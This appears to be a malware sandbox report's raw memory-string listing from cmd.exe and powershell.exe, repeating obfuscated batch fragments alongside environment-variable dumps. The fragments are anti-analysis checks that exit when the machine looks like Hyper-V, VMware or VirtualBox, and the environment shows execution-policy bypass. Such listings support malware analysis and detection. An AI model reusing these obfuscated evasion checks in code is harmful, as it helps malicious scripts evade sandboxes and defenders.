Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lwindir=C:\Windowsx=my=nz=oWW
Source: powershell.exe, 00000029.00000002.2239373848.0000016D32873000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=Oee
Source: cmd.exe, 0000000B.00000003.1412739456.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nL
Source: cmd.exe, 0000000B.00000003.1446133715.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: alxeNxgsZiGoJAY%OzHutdjL%"=="VMware,
Source: cmd.exe, 0000000B.00000003.1416890437.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o__
Source: cmd.exe, 0000000B.00000003.1491716510.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=Oh
Source: cmd.exe, 0000000B.00000003.1437063764.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=ORR
Source: cmd.exe, 0000000B.00000003.1424505875.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxN
Source: cmd.exe, 0000000B.00000003.1441338705.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=ONNGS
Source: cmd.exe, 0000000B.00000003.1408115597.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kwindir=C:\Windows,
Source: cmd.exe, 0000000B.00000003.1440670625.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=Oz
Source: cmd.exe, 0000000B.00000003.1413984610.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=ob
Source: powershell.exe, 00000029.00000002.1870747846.000000C0000E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: zyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif 